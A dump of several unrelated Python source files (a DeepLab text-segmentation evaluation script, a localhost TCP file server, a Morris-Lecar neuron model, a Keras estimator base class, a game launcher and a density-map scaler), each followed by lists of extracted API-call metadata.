] | [((107, 138), 'numpy.linspace', 'np.linspace', (['(0.0)', '(2 * np.pi)', '(20)'], {}), '(0.0, 2 * np.pi, 20)\n', (118, 138), True, 'import numpy as np\n'), ((139, 148), 'numpy.sin', 'np.sin', (['x'], {}), '(x)\n', (145, 148), True, 'import numpy as np\n'), ((660, 667), 'gekko.GEKKO', 'GEKKO', ([], {}), '()\n', (665, 667), False, 'from gekko import GEKKO\n'), ((676, 683), 'gekko.GEKKO', 'GEKKO', ([], {}), '()\n', (681, 683), False, 'from gekko import GEKKO\n'), ((2750, 2789), 'numpy.linspace', 'np.linspace', (['(-2 * np.pi)', '(4 * np.pi)', '(100)'], {}), '(-2 * np.pi, 4 * np.pi, 100)\n', (2761, 2789), True, 'import numpy as np\n'), ((2846, 2858), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (2856, 2858), True, 'import matplotlib.pyplot as plt\n'), ((2859, 2893), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y', '"""bo"""'], {'label': '"""data"""'}), "(x, y, 'bo', label='data')\n", (2867, 2893), True, 'import matplotlib.pyplot as plt\n'), ((2891, 2957), 'matplotlib.pyplot.plot', 'plt.plot', (['test.inpt.value', 'test.outpt.value', '"""r-"""'], {'label': '"""predict"""'}), "(test.inpt.value, test.outpt.value, 'r-', label='predict')\n", (2899, 2957), True, 'import matplotlib.pyplot as plt\n'), ((2955, 2977), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (2965, 2977), True, 'import matplotlib.pyplot as plt\n'), ((2978, 2993), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""y"""'], {}), "('y')\n", (2988, 2993), True, 'import matplotlib.pyplot as plt\n'), ((2994, 3009), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""x"""'], {}), "('x')\n", (3004, 3009), True, 'import matplotlib.pyplot as plt\n'), ((3010, 3020), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3018, 3020), True, 'import matplotlib.pyplot as plt\n')] |
import argparse
import os
import sys
import numpy as np
import pdb
from tqdm import tqdm
import cv2
import glob
import numpy as np
from numpy import *
import matplotlib
#matplotlib.use("Agg")
#matplotlib.use("wx")
#matplotlib.use('tkagg')
import matplotlib.pyplot as plt
import scipy
from scipy.special import softmax
import torch
from torch.utils.data import DataLoader
from torch.utils.data import Dataset
import torch.nn as nn
from modeling.sync_batchnorm.replicate import patch_replication_callback
from modeling.deeplab import *
from PIL import Image
# class load_data(Dataset):
# def __init__(self,args,img_path):
# super().__init__()
# self.args = args
# self.img_path = img_path
# def __getitem__(self,img_path):
# image = Image.open(self.img_path).convert('RGB')
# image = np.array(image).astype(np.float32).transpose((2, 0, 1))
# image = torch.from_numpy(image).float()
# return image
def get_model(nclass, args):
    """Build a DeepLab network and restore its weights from a checkpoint.

    Args:
        nclass: number of output classes.
        args: parsed CLI namespace (backbone, out_stride, sync_bn,
            freeze_bn, cuda, gpu_ids, resume).

    Returns:
        The network, wrapped in DataParallel and moved to GPU when
        args.cuda is set.
    """
    net = DeepLab(num_classes=nclass,
                backbone=args.backbone,
                output_stride=args.out_stride,
                sync_bn=args.sync_bn,
                freeze_bn=args.freeze_bn)
    # Using cuda
    if args.cuda:
        net = torch.nn.DataParallel(net, device_ids=args.gpu_ids)
        patch_replication_callback(net)
        net = net.cuda()
    checkpoint = torch.load(args.resume)
    # DataParallel stores the real model under .module.
    target = net.module if args.cuda else net
    target.load_state_dict(checkpoint['state_dict'])
    print("=> loaded checkpoint '{}' (epoch {})".format(args.resume, checkpoint['epoch']))
    return net
def get_pred(img_path, model, args):
    """Run one image through the network and return the raw prediction.

    The image is loaded as RGB, converted to a float32 CHW tensor with a
    batch dimension, optionally moved to the GPU, and evaluated with
    gradients disabled.
    """
    model.eval()
    rgb = Image.open(img_path).convert('RGB')
    chw = np.array(rgb).astype(np.float32).transpose((2, 0, 1))
    batch = torch.from_numpy(np.expand_dims(chw, axis=0)).float()
    if args.cuda:
        batch = batch.cuda()
    with torch.no_grad():
        output = model(batch)
    return output.data.cpu().numpy()
def F1_loss(pred, target):
    """Compute F1, accuracy, precision and recall for binary masks.

    Args:
        pred: boolean (or 0/1) array of predicted foreground pixels.
        target: boolean (or 0/1) ground-truth array, same shape as pred.

    Returns:
        Tuple (F1, accuracy, precision, recall) as floats.

    Note:
        "accuracy" here is Tp / |pred OR target| (effectively intersection
        over union), because true negatives outside the union are never
        counted -- this mirrors the original formulation.
    """
    pred = np.asarray(pred, dtype=bool)
    target = np.asarray(target, dtype=bool)
    N = np.logical_or(pred, target)    # union of both masks
    Tp = np.logical_and(pred, target)  # true positives
    # BUG FIX: np.subtract is not defined for boolean arrays (it raises a
    # TypeError on modern NumPy); use logical operations instead.  The old
    # code also passed a third positional argument to np.logical_or, which
    # NumPy treats as the *out* array and so silently overwrote Fn.
    Fn = np.logical_and(target, np.logical_not(pred))  # missed pixels
    Fp = np.logical_and(pred, np.logical_not(target))  # false alarms
    # Within the union N this is always empty; kept for parity with F1_rwi.
    Tn = np.logical_and(N, np.logical_not(Tp | Fp | Fn))
    precision = np.sum(Tp) / (np.sum(Tp) + np.sum(Fp))
    recall = np.sum(Tp) / (np.sum(Tp) + np.sum(Fn))
    F1 = (2 * np.sum(Tp)) / (2 * np.sum(Tp) + np.sum(Fn) + np.sum(Fp))
    accuracy = np.sum(Tp + Tn) / np.sum(N)
    return F1, accuracy, precision, recall
def F1_rwi(pred, target):
    """F1, accuracy, precision and recall using bitwise ops on boolean masks.

    Both inputs must be boolean arrays of the same shape.  "accuracy" is
    computed over the union of the two masks only.
    """
    union = np.logical_or(pred, target)
    true_pos = np.logical_and(pred, target)
    # XOR removes the true positives from each mask.
    false_neg = np.bitwise_xor(target, true_pos)
    false_pos = np.bitwise_xor(pred, true_pos)
    covered = np.logical_or(np.logical_or(true_pos, false_pos), false_neg)
    true_neg = np.bitwise_xor(union, covered)
    tp = true_pos.sum()
    fp = false_pos.sum()
    fn = false_neg.sum()
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    F1 = 2 * tp / (2 * tp + fn + fp)
    accuracy = (tp + true_neg.sum()) / union.sum()
    return F1, accuracy, precision, recall
if __name__=='__main__':
    #### Parameters and paths (hard-coded; adjust for your environment):
    nclass = 2
    save_rrc_res_path = "/path/to/deepLabV3Plus/deeplabv3plus_pixelWise/results/validation_images/B_260/"
    model_path = "/path/to/deepLabV3Plus/deeplabv3plus_pixelWise/results/icdar_models/run/icdar/deeplab-resnet/model_best.pth.tar"
    alphabet="#abcdefghijklmnopqrstuvwxyz1234567890@"
    img_path = "/path/to/GAN_text/data/text_segmentation/test/A/"
    gt_path = "/path/to/GAN_text/data/text_segmentation/test/B_gt_1chanel/"
    ### args
    parser = argparse.ArgumentParser(description="PyTorch DeeplabV3Plus Heatmap Prediction")
    parser.add_argument('--backbone', type=str, default='resnet',
                        choices=['resnet', 'xception', 'drn', 'mobilenet'],
                        help='backbone name (default: resnet)')
    parser.add_argument('--freeze-bn', type=bool, default=False,
                        help='whether to freeze bn parameters (default: False)')
    parser.add_argument('--out-stride', type=int, default=16,
                        help='network output stride (default: 8)')
    parser.add_argument('--no-cuda', action='store_true', default=False,
                        help='disables CUDA training')
    parser.add_argument('--gpu-ids', type=str, default='0',
                        help='use which gpu to train, must be a \
                        comma-separated list of integers only (default=0)')
    parser.add_argument('--sync-bn', type=bool, default=None,
                        help='whether to use sync bn (default: auto)')
    ##checking point
    parser.add_argument('--resume', type=str, default= model_path,
                        help='put the path to resuming file if needed')
    args = parser.parse_args()
    args.cuda = not args.no_cuda and torch.cuda.is_available()
    if args.cuda:
        try:
            args.gpu_ids = [int(s) for s in args.gpu_ids.split(',')]
        except ValueError:
            raise ValueError('Argument --gpu_ids must be a comma-separated list of integers only')
    # sync_bn defaults to on only for multi-GPU CUDA runs.
    if args.sync_bn is None:
        if args.cuda and len(args.gpu_ids) > 1:
            args.sync_bn = True
        else:
            args.sync_bn = False
    image_files = sorted(glob.glob(img_path+'*.png')) #'*.jpg'))
    trained_model = get_model(nclass,args)
    # Per-image metrics accumulated over the whole test set.
    f1_all = []
    accuracy_all = []
    f1_all_rwi = []
    accuracy_all_rwi = []
    #for img_path in sys.argv[1:]:
    #for i in range(0,10):
    for i in range(0,len(image_files)):
        img_path = image_files[i]
        print("image path is: {}".format(img_path))
        # Ground truth shares the image's basename under gt_path.
        img_name = img_path.split('/')[-1].split('.')[0]
        gt = asarray(Image.open(gt_path+img_name+'.png'))
        #trained_model = get_model(nclass,args)
        #pdb.set_trace()
        # load_test_data = load_data(args,img_path)
        # dataloader = DataLoader(load_test_data)
        # for ii, img_test in enumerate(dataloader):
        pred = get_pred(img_path,trained_model,args)
        # Convert logits to per-class probabilities over the channel axis.
        pred = softmax(pred, axis=1)
        #image_source = cv2.imread(img_path)
        #image_source = cv2.resize(image_source, (512, 512))
        #pdb.set_trace()
        #fig = plt.figure()
        # plt.imshow(pred.squeeze()[1,:,:])
        # plt.show()
        # res = pred.squeeze()[1,:,:]>0.3
        #res = np.argmax(pred.squeeze(), axis=0)
        #pdb.set_trace()
        # plt.imshow(res)
        # plt.show()
        #ret,pred_bin = cv2.threshold(pred.squeeze()[1,:,:],0.2,255,cv2.THRESH_BINARY)
        pred_bin = np.argmax(pred.squeeze(), axis=0)
        #pdb.set_trace()
        # NOTE(review): pred_bin comes from argmax over 2 classes, so its
        # values are 0/1 and `pred_bin>5` is always False -- confirm the
        # intended threshold.
        f1, acc, prc, rcl = F1_loss(pred_bin>5,gt>5)
        print("F1 is {}, accuracy is {}, precision is {}, recall is {}".format(f1,acc,prc,rcl))
        #pdb.set_trace()
        pred_bin_8 = pred_bin.astype(np.uint8)
        f1_rwi, acc_rwi, prc_rwi, rcl_rwi = F1_rwi(pred_bin_8>5,gt>5)
        print("F1_rwi is {}, accuracy_rwi is {}, precision_rwi is {}, recall_rwi is {}".format(f1_rwi,acc_rwi,prc_rwi,rcl_rwi))
        f1_all.append(f1)
        accuracy_all.append(acc)
        f1_all_rwi.append(f1_rwi)
        accuracy_all_rwi.append(acc_rwi)
    # Dataset-level averages of the per-image metrics.
    print("the average of F1 is {}".format(np.mean(f1_all)))
    print("the average accuracy is {}".format(np.mean(accuracy_all)))
    print("the average of F1_rwi is {}".format(np.mean(f1_all_rwi)))
    print("the average accuracy_rwi is {}".format(np.mean(accuracy_all_rwi)))
"modeling.sync_batchnorm.replicate.patch_replication_callback",
"numpy.mean",
"PIL.Image.open",
"numpy.logical_and",
"argparse.ArgumentParser",
"torch.load",
"numpy.bitwise_xor",
"numpy.logical_or",
"numpy.subtract",
"torch.nn.DataParallel",
"torch.from_numpy",
"numpy.sum",
"numpy.array",
... | [((1440, 1463), 'torch.load', 'torch.load', (['args.resume'], {}), '(args.resume)\n', (1450, 1463), False, 'import torch\n'), ((1961, 1990), 'numpy.expand_dims', 'np.expand_dims', (['image'], {'axis': '(0)'}), '(image, axis=0)\n', (1975, 1990), True, 'import numpy as np\n'), ((2333, 2360), 'numpy.logical_or', 'np.logical_or', (['pred', 'target'], {}), '(pred, target)\n', (2346, 2360), True, 'import numpy as np\n'), ((2380, 2408), 'numpy.logical_and', 'np.logical_and', (['pred', 'target'], {}), '(pred, target)\n', (2394, 2408), True, 'import numpy as np\n'), ((2417, 2440), 'numpy.subtract', 'np.subtract', (['target', 'Tp'], {}), '(target, Tp)\n', (2428, 2440), True, 'import numpy as np\n'), ((2524, 2545), 'numpy.subtract', 'np.subtract', (['pred', 'Tp'], {}), '(pred, Tp)\n', (2535, 2545), True, 'import numpy as np\n'), ((3258, 3285), 'numpy.logical_or', 'np.logical_or', (['pred', 'target'], {}), '(pred, target)\n', (3271, 3285), True, 'import numpy as np\n'), ((3305, 3333), 'numpy.logical_and', 'np.logical_and', (['pred', 'target'], {}), '(pred, target)\n', (3319, 3333), True, 'import numpy as np\n'), ((3343, 3369), 'numpy.bitwise_xor', 'np.bitwise_xor', (['target', 'Tp'], {}), '(target, Tp)\n', (3357, 3369), True, 'import numpy as np\n'), ((3417, 3441), 'numpy.bitwise_xor', 'np.bitwise_xor', (['pred', 'Tp'], {}), '(pred, Tp)\n', (3431, 3441), True, 'import numpy as np\n'), ((3499, 3520), 'numpy.bitwise_xor', 'np.bitwise_xor', (['N', 'xx'], {}), '(N, xx)\n', (3513, 3520), True, 'import numpy as np\n'), ((4288, 4367), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""PyTorch DeeplabV3Plus Heatmap Prediction"""'}), "(description='PyTorch DeeplabV3Plus Heatmap Prediction')\n", (4311, 4367), False, 'import argparse\n'), ((1297, 1350), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model'], {'device_ids': 'args.gpu_ids'}), '(model, device_ids=args.gpu_ids)\n', (1318, 1350), False, 'import torch\n'), ((1359, 1392), 
'modeling.sync_batchnorm.replicate.patch_replication_callback', 'patch_replication_callback', (['model'], {}), '(model)\n', (1385, 1392), False, 'from modeling.sync_batchnorm.replicate import patch_replication_callback\n'), ((2092, 2107), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2105, 2107), False, 'import torch\n'), ((2573, 2598), 'numpy.logical_or', 'np.logical_or', (['Tp', 'Fp', 'Fn'], {}), '(Tp, Fp, Fn)\n', (2586, 2598), True, 'import numpy as np\n'), ((2636, 2646), 'numpy.sum', 'np.sum', (['Tp'], {}), '(Tp)\n', (2642, 2646), True, 'import numpy as np\n'), ((2684, 2694), 'numpy.sum', 'np.sum', (['Tp'], {}), '(Tp)\n', (2690, 2694), True, 'import numpy as np\n'), ((3073, 3088), 'numpy.sum', 'np.sum', (['(Tp + Tn)'], {}), '(Tp + Tn)\n', (3079, 3088), True, 'import numpy as np\n'), ((3087, 3096), 'numpy.sum', 'np.sum', (['N'], {}), '(N)\n', (3093, 3096), True, 'import numpy as np\n'), ((3464, 3485), 'numpy.logical_or', 'np.logical_or', (['Tp', 'Fp'], {}), '(Tp, Fp)\n', (3477, 3485), True, 'import numpy as np\n'), ((5542, 5567), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (5565, 5567), False, 'import torch\n'), ((6002, 6031), 'glob.glob', 'glob.glob', (["(img_path + '*.png')"], {}), "(img_path + '*.png')\n", (6011, 6031), False, 'import glob\n'), ((6794, 6815), 'scipy.special.softmax', 'softmax', (['pred'], {'axis': '(1)'}), '(pred, axis=1)\n', (6801, 6815), False, 'from scipy.special import softmax\n'), ((1791, 1811), 'PIL.Image.open', 'Image.open', (['img_path'], {}), '(img_path)\n', (1801, 1811), False, 'from PIL import Image\n'), ((2003, 2026), 'torch.from_numpy', 'torch.from_numpy', (['image'], {}), '(image)\n', (2019, 2026), False, 'import torch\n'), ((2648, 2658), 'numpy.sum', 'np.sum', (['Tp'], {}), '(Tp)\n', (2654, 2658), True, 'import numpy as np\n'), ((2659, 2669), 'numpy.sum', 'np.sum', (['Fp'], {}), '(Fp)\n', (2665, 2669), True, 'import numpy as np\n'), ((2696, 2706), 'numpy.sum', 'np.sum', (['Tp'], {}), '(Tp)\n', 
(2702, 2706), True, 'import numpy as np\n'), ((2707, 2717), 'numpy.sum', 'np.sum', (['Fn'], {}), '(Fn)\n', (2713, 2717), True, 'import numpy as np\n'), ((2732, 2742), 'numpy.sum', 'np.sum', (['Tp'], {}), '(Tp)\n', (2738, 2742), True, 'import numpy as np\n'), ((2769, 2779), 'numpy.sum', 'np.sum', (['Fp'], {}), '(Fp)\n', (2775, 2779), True, 'import numpy as np\n'), ((6442, 6481), 'PIL.Image.open', 'Image.open', (["(gt_path + img_name + '.png')"], {}), "(gt_path + img_name + '.png')\n", (6452, 6481), False, 'from PIL import Image\n'), ((7978, 7993), 'numpy.mean', 'np.mean', (['f1_all'], {}), '(f1_all)\n', (7985, 7993), True, 'import numpy as np\n'), ((8046, 8067), 'numpy.mean', 'np.mean', (['accuracy_all'], {}), '(accuracy_all)\n', (8053, 8067), True, 'import numpy as np\n'), ((8122, 8141), 'numpy.mean', 'np.mean', (['f1_all_rwi'], {}), '(f1_all_rwi)\n', (8129, 8141), True, 'import numpy as np\n'), ((8198, 8223), 'numpy.mean', 'np.mean', (['accuracy_all_rwi'], {}), '(accuracy_all_rwi)\n', (8205, 8223), True, 'import numpy as np\n'), ((2758, 2768), 'numpy.sum', 'np.sum', (['Fn'], {}), '(Fn)\n', (2764, 2768), True, 'import numpy as np\n'), ((1893, 1908), 'numpy.array', 'np.array', (['image'], {}), '(image)\n', (1901, 1908), True, 'import numpy as np\n'), ((2747, 2757), 'numpy.sum', 'np.sum', (['Tp'], {}), '(Tp)\n', (2753, 2757), True, 'import numpy as np\n')] |
# import the socket library since we use IPC sockets
import socket
# IP address to bind to (loopback only)
TCP_IP = '127.0.0.1'
# port to bind to
TCP_PORT = 5005
# buffer size used when reading/sending the file
BUFFER_SIZE = 4096
# create the socket (TCP, i.e. SOCK_STREAM)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# bind to the IP and port
s.bind((TCP_IP, TCP_PORT))
# start listening (backlog of 1)
s.listen(1)
# block until a client connects
conn, addr = s.accept()
print ('Connection address:', addr)
# open the file named "download.txt"
# path is still hard coded: the file must live in the same folder as this script
f = open("download.txt", "rb")
try:
    # read the file one buffer-sized chunk at a time
    byte = f.read(BUFFER_SIZE)
    # loop until END OF FILE; in Python EOF is b''
    while byte != b'':
        # send the chunk just read to the client
        conn.send(byte)
        # read the next chunk, up to EOF
        byte = f.read(BUFFER_SIZE)
finally:
    print ("end sending")
# close the file once it has been fully read
f.close()
# close the listening socket
s.close()
# close the client connection
conn.close()
| [
"socket.socket"
] | [((285, 334), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (298, 334), False, 'import socket\n')] |
import numpy as np
from scipy.integrate import odeint
class MorrisLecar:
"""
Creates a MorrisLecar model.
"""
def __init__(self, C=20, VL=-60, VCa=120, VK=-84, gL=2, gCa=4, gK=8,
V1=-1.2, V2=18, V3=12, V4=17.4, phi=0.06):
"""
Initializes the model.
Args:
C (int, float): Capacitance of the membrane.
VL (int, float): Potential L.
VCa (int, float): Potential Ca.
VK (int, float): Potential K.
gL (int, float): Conductance L.
gCa (int, float): Conductance Ca.
gK (int, float): Conductance K.
V1 (int, float): Potential at which Mss converges.
V2 (int, float): Reciprocal of slope of Mss.
V3 (int, float): Potential at which Nss converges.
V4 (int, float): Reciprocal of slope of Nss.
phi (int, float): Time scale recovery.
"""
self.C = C
self.VL = VL
self.VCa = VCa
self.VK = VK
self.gL = gL
self.gCa = gCa
self.gK = gK
self.V1 = V1
self.V2 = V2
self.V3 = V3
self.V4 = V4
self.phi = phi
self.t = None
self.dt = None
self.tvec = None
self.V = None
self.N = None
def __repr__(self):
"""
Visualize model parameters when printing.
"""
return (f'MorrisLecar(C={self.C}, VL={self.VL}, VCa={self.VCa}, VK={self.VK}, '
f'gL={self.gL}, gCa={self.gCa}, gK={self.gK}, V1={self.V1}, V2={self.V2}, '
f'V3={self.V3}, V4={self.V4}, phi={self.phi})')
def _system_equations(self, X, t, current):
"""
Defines the equations of the dynamical system for integration.
"""
Mss = (1 + np.tanh((X[0] - self.V1) / self.V2)) / 2
Nss = (1 + np.tanh((X[0] - self.V3) / self.V4)) / 2
tau = 1 / self.phi * (np.cosh((X[0] - self.V3) / (2 * self.V4)))
return [(1 / self.C) * (current - self.gL * (X[0] - self.VL) - self.gCa * Mss * (X[0] - self.VCa) - self.gK * X[1] * (X[0] - self.VK)),
(Nss - X[1]) / tau]
def run(self, X0=[0, 0], current=1, t=100, dt=0.01):
"""
Runs the model.
Args:
X0 (list, optional): Initial values of V and N. Defaults to [0, 0].
current (int, optional): External current. Defaults to 1.
t (int, optional): Total time for the simulation. Defaults to 100.
dt (float, optional): Simulation step. Defaults to 0.01.
"""
self.current = current
self.t = t
self.dt = dt
self.tvec = np.arange(0, self.t, self.dt)
X = odeint(self._system_equations, X0, self.tvec, (current,))
self.V, self.N = X[:, 0], X[:, 1]
| [
"scipy.integrate.odeint",
"numpy.tanh",
"numpy.cosh",
"numpy.arange"
] | [((2678, 2707), 'numpy.arange', 'np.arange', (['(0)', 'self.t', 'self.dt'], {}), '(0, self.t, self.dt)\n', (2687, 2707), True, 'import numpy as np\n'), ((2720, 2777), 'scipy.integrate.odeint', 'odeint', (['self._system_equations', 'X0', 'self.tvec', '(current,)'], {}), '(self._system_equations, X0, self.tvec, (current,))\n', (2726, 2777), False, 'from scipy.integrate import odeint\n'), ((1944, 1985), 'numpy.cosh', 'np.cosh', (['((X[0] - self.V3) / (2 * self.V4))'], {}), '((X[0] - self.V3) / (2 * self.V4))\n', (1951, 1985), True, 'import numpy as np\n'), ((1813, 1848), 'numpy.tanh', 'np.tanh', (['((X[0] - self.V1) / self.V2)'], {}), '((X[0] - self.V1) / self.V2)\n', (1820, 1848), True, 'import numpy as np\n'), ((1873, 1908), 'numpy.tanh', 'np.tanh', (['((X[0] - self.V3) / self.V4)'], {}), '((X[0] - self.V3) / self.V4)\n', (1880, 1908), True, 'import numpy as np\n')] |
"""Abstract Base Class for Keras Models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import tensorflow as tf
from keras import models
from tf_trainer.common import types
from tf_trainer.common import base_model
class BaseKerasModel(base_model.BaseModel):
  """Abstract Base Class for Keras Models.

  Interface for Keras models: subclasses supply a compiled Keras model via
  _get_keras_model(), and estimator() converts it into a tf.Estimator.
  """

  # Scratch directory used only for model_to_estimator's intermediate
  # checkpoint; the real model_dir is swapped in afterwards.
  TMP_MODEL_DIR = '/tmp/keras_model'

  @abc.abstractmethod
  def _get_keras_model(self) -> models.Model:
    """Compiled Keras model.

    Inputs should be word embeddings.
    """
    pass

  def estimator(self, model_dir):
    """Estimator created based on this instance's Keras model.

    The generated estimator expects a tokenized text input (i.e. a sequence
    of words), and is responsible for generating the embedding with the
    provided preprocessor).
    """
    keras_model = self._get_keras_model()
    # IMPORTANT: model_to_estimator creates a checkpoint, however this checkpoint
    # does not contain the embedding variable (or other variables that we might
    # want to add outside of the Keras model). The workaround is to specify a
    # model_dir that is *not* the actual model_dir of the final model.
    estimator = tf.keras.estimator.model_to_estimator(
        keras_model=keras_model, model_dir=BaseKerasModel.TMP_MODEL_DIR)
    # Re-point the estimator's config at the caller's real model_dir.
    new_config = estimator.config.replace(model_dir=model_dir)

    # Why does estimator.model_fn not include params...
    # Wrapper so we can rebuild the Estimator with the new config while
    # reusing the converted model_fn (which ignores `params`).
    def new_model_fn(features, labels, mode, params, config):
      return estimator.model_fn(features, labels, mode, config)

    return tf.estimator.Estimator(
        new_model_fn, config=new_config, params=estimator.params)

  @staticmethod
  def roc_auc(y_true: types.Tensor, y_pred: types.Tensor,
              threshold=0.5) -> types.Tensor:
    """ROC AUC based on TF's metrics package. This provides AUC in a Keras
    metrics compatible way (Keras doesn't have AUC otherwise).

    We assume true labels are 'soft' and pick 0 or 1 based on a threshold.
    """
    y_bool_true = tf.greater(y_true, threshold)
    # NOTE(review): tf.metrics.auc is the TF1-style streaming metric; the
    # running value is discarded and the update op is returned so Keras
    # evaluates/advances the accumulator each batch.
    value, update_op = tf.metrics.auc(y_bool_true, y_pred)
    return update_op
| [
"tensorflow.metrics.auc",
"tensorflow.keras.estimator.model_to_estimator",
"tensorflow.estimator.Estimator",
"tensorflow.greater"
] | [((1264, 1371), 'tensorflow.keras.estimator.model_to_estimator', 'tf.keras.estimator.model_to_estimator', ([], {'keras_model': 'keras_model', 'model_dir': 'BaseKerasModel.TMP_MODEL_DIR'}), '(keras_model=keras_model, model_dir=\n BaseKerasModel.TMP_MODEL_DIR)\n', (1301, 1371), True, 'import tensorflow as tf\n'), ((1635, 1720), 'tensorflow.estimator.Estimator', 'tf.estimator.Estimator', (['new_model_fn'], {'config': 'new_config', 'params': 'estimator.params'}), '(new_model_fn, config=new_config, params=estimator.params\n )\n', (1657, 1720), True, 'import tensorflow as tf\n'), ((2086, 2115), 'tensorflow.greater', 'tf.greater', (['y_true', 'threshold'], {}), '(y_true, threshold)\n', (2096, 2115), True, 'import tensorflow as tf\n'), ((2139, 2174), 'tensorflow.metrics.auc', 'tf.metrics.auc', (['y_bool_true', 'y_pred'], {}), '(y_bool_true, y_pred)\n', (2153, 2174), True, 'import tensorflow as tf\n')] |
import game.shared.gamecontants as gameconstants
from game.casting.cast import Cast
from game.casting.cycle import Cycle
from game.directing.director import Director
from game.services.keyboard_service import KeyboardService
from game.services.display_service import DisplayService
from game.shared.color import Color
from game.shared.point import Point
def main():
    """Build the cast, position both light cycles, wire up the services,
    and hand control to the director's game loop."""
    cast = Cast()

    # NOTE(review): banner creation was already disabled in the original
    # source ("NEEDS TO BE UPDATED"); kept here as comments for future work.
    # banner = Actor()
    # banner.set_text("")
    # banner.set_font_size(gameconstants.FONT_SIZE)
    # banner.set_color(gameconstants.WHITE)
    # banner.set_position(Point(gameconstants.CELL_SIZE, 0))
    # cast.add_actor("banners", banner)

    # Position cycles proportionally to the grid: one a third of the way
    # across, the other two thirds across, both vertically centered.
    mid_row = int(gameconstants.ROWS / 2)
    placements = (
        ("cycle1", int(gameconstants.COLS / 3), 1, (50, 125, 200)),
        ("cycle2", int(gameconstants.COLS / 3 * 2), 3, (0, 0, 200)),
    )
    for label, column, cycle_id, rgb in placements:
        cell = Point(column, mid_row).scale(gameconstants.CELL_SIZE)
        rider = Cycle(cell, cycle_id)
        rider.set_velocity(Point(0, 0))
        rider.set_color(Color(*rgb))
        cast.add_actor(label, rider)

    # Start the game.
    keyboard = KeyboardService()
    display = DisplayService(
        gameconstants.CAPTION.format(gameconstants.CENTER),
        gameconstants.MAX_X,
        gameconstants.MAX_Y,
        gameconstants.CELL_SIZE,
        gameconstants.FRAME_RATE
    )
    Director(keyboard, display).start_game(cast)


if __name__ == "__main__":
    main()
| [
"game.shared.point.Point",
"game.casting.cycle.Cycle",
"game.shared.gamecontants.CAPTION.format",
"game.casting.cast.Cast",
"game.services.keyboard_service.KeyboardService",
"game.directing.director.Director",
"game.shared.color.Color"
] | [((405, 411), 'game.casting.cast.Cast', 'Cast', ([], {}), '()\n', (409, 411), False, 'from game.casting.cast import Cast\n'), ((933, 951), 'game.casting.cycle.Cycle', 'Cycle', (['position', '(1)'], {}), '(position, 1)\n', (938, 951), False, 'from game.casting.cycle import Cycle\n'), ((1221, 1239), 'game.casting.cycle.Cycle', 'Cycle', (['position', '(3)'], {}), '(position, 3)\n', (1226, 1239), False, 'from game.casting.cycle import Cycle\n'), ((1398, 1415), 'game.services.keyboard_service.KeyboardService', 'KeyboardService', ([], {}), '()\n', (1413, 1415), False, 'from game.services.keyboard_service import KeyboardService\n'), ((1663, 1706), 'game.directing.director.Director', 'Director', (['keyboard_service', 'display_service'], {}), '(keyboard_service, display_service)\n', (1671, 1706), False, 'from game.directing.director import Director\n'), ((976, 987), 'game.shared.point.Point', 'Point', (['(0)', '(0)'], {}), '(0, 0)\n', (981, 987), False, 'from game.shared.point import Point\n'), ((1010, 1029), 'game.shared.color.Color', 'Color', (['(50)', '(125)', '(200)'], {}), '(50, 125, 200)\n', (1015, 1029), False, 'from game.shared.color import Color\n'), ((1264, 1275), 'game.shared.point.Point', 'Point', (['(0)', '(0)'], {}), '(0, 0)\n', (1269, 1275), False, 'from game.shared.point import Point\n'), ((1298, 1314), 'game.shared.color.Color', 'Color', (['(0)', '(0)', '(200)'], {}), '(0, 0, 200)\n', (1303, 1314), False, 'from game.shared.color import Color\n'), ((1462, 1512), 'game.shared.gamecontants.CAPTION.format', 'gameconstants.CAPTION.format', (['gameconstants.CENTER'], {}), '(gameconstants.CENTER)\n', (1490, 1512), True, 'import game.shared.gamecontants as gameconstants\n')] |
import logging
import numpy as np
from .transformer import Transformer, FFTTransformer
logger = logging.getLogger(__name__)
class MapScaler:
    """Scale, subtract, and clamp an observed density map against a model
    map computed from an atomic structure."""

    def __init__(self, xmap, scattering='xray'):
        self.xmap = xmap
        self.scattering = scattering
        # Scratch map on the same grid as xmap; reused for model densities.
        self._model_map = xmap.zeros_like(xmap)

    def subtract(self, structure):
        """Subtract the calculated density of `structure` from the map."""
        # Use the FFT transformer when reflection data (hkl) is available,
        # otherwise fall back to a direct-space transformer.
        if self.xmap.hkl is not None:
            hkl = self.xmap.hkl
            transformer = FFTTransformer(
                structure, self._model_map, hkl=hkl, scattering=self.scattering)
        else:
            transformer = Transformer(
                structure, self._model_map, simple=True,
                rmax=3, scattering=self.scattering)
        logger.info("Subtracting density.")
        transformer.density()
        self.xmap.array -= self._model_map.array

    def scale(self, structure, radius=1):
        """Linearly rescale the observed map onto the calculated map.

        A least-squares fit (scale factor + offset) is computed over grid
        points within `radius` of the structure's atoms, and the observed
        map is transformed in place.
        """
        if self.xmap.hkl is not None:
            hkl = self.xmap.hkl
            transformer = FFTTransformer(structure, self._model_map,
                                           hkl=hkl, scattering=self.scattering)
        else:
            transformer = Transformer(structure, self._model_map, simple=True,
                                      rmax=3, scattering=self.scattering)
        # Get all map coordinates of interest:
        transformer.mask(radius)
        mask = self._model_map.array > 0
        # Calculate map based on structure:
        transformer.reset(full=True)
        transformer.density()
        # Get all map values of interest
        xmap_masked = self.xmap.array[mask]
        model_masked = self._model_map.array[mask]
        # Get the mean of masked observed and masked calculated map values
        xmap_masked_mean = xmap_masked.mean()
        model_masked_mean = model_masked.mean()
        # Get optimal scaling factor and mean-difference.
        # Centering both sets first makes s2/s1 the least-squares slope.
        xmap_masked -= xmap_masked_mean
        model_masked -= model_masked_mean
        s2 = np.dot(model_masked, xmap_masked)
